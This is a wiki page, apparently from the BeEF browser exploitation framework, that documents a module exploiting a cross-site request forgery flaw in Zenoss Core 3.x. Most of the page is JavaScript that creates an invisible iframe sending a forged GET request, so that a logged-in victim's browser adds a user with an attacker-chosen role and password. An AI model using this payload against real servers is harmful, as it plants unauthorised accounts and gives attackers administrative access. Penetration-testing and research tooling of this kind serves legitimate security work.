-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Zenoss 3.2.1 Add User CSRF
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: add a user to a Zenoss Core 3.x server
-
Authors: bcoles
-
Browsers: All
Uses an invisible iframe with a GET request to add an user account
var base = '<%= @base %>';
var user_level = '<%= @user_level %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK